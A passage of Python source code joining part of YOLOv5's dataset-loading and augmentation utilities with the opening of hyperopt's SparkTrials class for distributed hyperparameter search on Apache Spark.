if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
except:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
_, i = np.unique(l, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
l = l[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.img_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.img_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
spark.py
|
import copy
import threading
import time
import timeit
import traceback
from hyperopt import base, fmin, Trials
from hyperopt.base import validate_timeout, validate_loss_threshold
from hyperopt.utils import coarse_utcnow, _get_logger, _get_random_id
try:
from pyspark.sql import SparkSession
from pyspark.util import VersionUtils
import pyspark
_have_spark = True
_spark_major_minor_version = VersionUtils.majorMinorVersion(pyspark.__version__)
except ImportError as e:
_have_spark = False
_spark_major_minor_version = None
logger = _get_logger("hyperopt-spark")
class SparkTrials(Trials):
"""
Implementation of hyperopt.Trials supporting
distributed execution using Apache Spark clusters.
This requires fmin to be run on a Spark cluster.
Plugging SparkTrials into hyperopt.fmin() allows hyperopt
to send model training and evaluation tasks to Spark workers,
parallelizing hyperparameter search.
Each trial (set of hyperparameter values) is handled within
a single Spark task; i.e., each model will be fit and evaluated
on a single worker machine. Trials are run asynchronously.
See hyperopt.Trials docs for general information about Trials.
The fields we store in our trial docs match the base Trials class. The fields include:
- 'tid': trial ID
- 'state': JOB_STATE_DONE, JOB_STATE_ERROR, etc.
- 'result': evaluation result for completed trial run
- 'refresh_time': timestamp for last status update
- 'misc': includes:
- 'error': (error type, error message)
- 'book_time': timestamp for trial run start
"""
asynchronous = True
# Hard cap on the number of concurrent hyperopt tasks (Spark jobs) to run. Set at 128.
MAX_CONCURRENT_JOBS_ALLOWED = 128
def __init__(
self, parallelism=None, timeout=None, loss_threshold=None, spark_session=None
):
"""
:param parallelism: Maximum number of parallel trials to run,
i.e., maximum number of concurrent Spark tasks.
The actual parallelism is subject to available Spark task slots at
runtime.
If set to None (default) or a non-positive value, this will be set to
Spark's default parallelism or `1`.
We cap the value at `MAX_CONCURRENT_JOBS_ALLOWED=128`.
:param timeout: Maximum time (in seconds) which fmin is allowed to take.
If this timeout is hit, then fmin will cancel running and proposed trials.
It will retain all completed trial runs and return the best result found
so far.
:param spark_session: A SparkSession object. If None is passed, SparkTrials will attempt
to use an existing SparkSession or create a new one. SparkSession is
the entry point for various facilities provided by Spark. For more
information, visit the documentation for PySpark.
"""
super().__init__(exp_key=None, refresh=False)
if not _have_spark:
raise Exception(
"SparkTrials cannot import pyspark classes. Make sure that PySpark "
"is available in your environment. E.g., try running 'import pyspark'"
)
validate_timeout(timeout)
validate_loss_threshold(loss_threshold)
self._spark = (
SparkSession.builder.getOrCreate()
if spark_session is None
else spark_session
)
self._spark_context = self._spark.sparkContext
# The feature to support controlling jobGroupIds is in SPARK-22340
self._spark_supports_job_cancelling = (
_spark_major_minor_version
>= (
3,
2,
)
or hasattr(self._spark_context.parallelize([1]), "collectWithJobGroup")
)
spark_default_parallelism = self._spark_context.defaultParallelism
self.parallelism = self._decide_parallelism(
requested_parallelism=parallelism,
spark_default_parallelism=spark_default_parallelism,
)
if not self._spark_supports_job_cancelling and timeout is not None:
logger.warning(
"SparkTrials was constructed with a timeout specified, but this Apache "
"Spark version does not support job group-based cancellation. The "
"timeout will be respected when starting new Spark jobs, but "
"SparkTrials will not be able to cancel running Spark jobs which exceed"
" the timeout."
)
self.timeout = timeout
self.loss_threshold = loss_threshold
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
self.refresh()
@staticmethod
def _decide_parallelism(requested_parallelism, spark_default_parallelism):
"""
Given the requested parallelism, return the max parallelism SparkTrials will actually use.
See the docstring for `parallelism` in the constructor for expected behavior.
"""
if requested_parallelism is None or requested_parallelism <= 0:
parallelism = max(spark_default_parallelism, 1)
logger.warning(
"Because the requested parallelism was None or a non-positive value, "
"parallelism will be set to ({d}), which is Spark's default parallelism ({s}), "
"or 1, whichever is greater. "
"We recommend setting parallelism explicitly to a positive value because "
"the total of Spark task slots is subject to cluster sizing.".format(
d=parallelism, s=spark_default_parallelism
)
)
else:
parallelism = requested_parallelism
if parallelism > SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED:
logger.warning(
"Parallelism ({p}) is capped at SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED ({c}).".format(
p=parallelism, c=SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
)
)
parallelism = SparkTrials.MAX_CONCURRENT_JOBS_ALLOWED
return parallelism
def count_successful_trials(self):
"""
Returns the current number of trials which ran successfully
"""
return self.count_by_state_unsynced(base.JOB_STATE_DONE)
def count_failed_trials(self):
"""
Returns the current number of trial runs which failed
"""
return self.count_by_state_unsynced(base.JOB_STATE_ERROR)
def count_cancelled_trials(self):
"""
Returns the current number of cancelled trial runs.
This covers trials which are cancelled from exceeding the timeout.
"""
return self.count_by_state_unsynced(base.JOB_STATE_CANCEL)
def count_total_trials(self):
"""
Returns the current number of all successful, failed, and cancelled trial runs
"""
total_states = [
base.JOB_STATE_DONE,
base.JOB_STATE_ERROR,
base.JOB_STATE_CANCEL,
]
return self.count_by_state_unsynced(total_states)
def delete_all(self):
"""
Reset the Trials to init state
"""
super().delete_all()
self._fmin_cancelled = False
self._fmin_cancelled_reason = None
def trial_attachments(self, trial):
raise NotImplementedError("SparkTrials does not support trial attachments.")
def fmin(
self,
fn,
space,
algo,
max_evals,
timeout,
loss_threshold,
max_queue_len,
rstate,
verbose,
pass_expr_memo_ctrl,
catch_eval_exceptions,
return_argmin,
show_progressbar,
early_stop_fn,
trials_save_file="",
):
"""
This should not be called directly but is called via :func:`hyperopt.fmin`
Refer to :func:`hyperopt.fmin` for docs on each argument
"""
if timeout is not None:
if self.timeout is not None:
logger.warning(
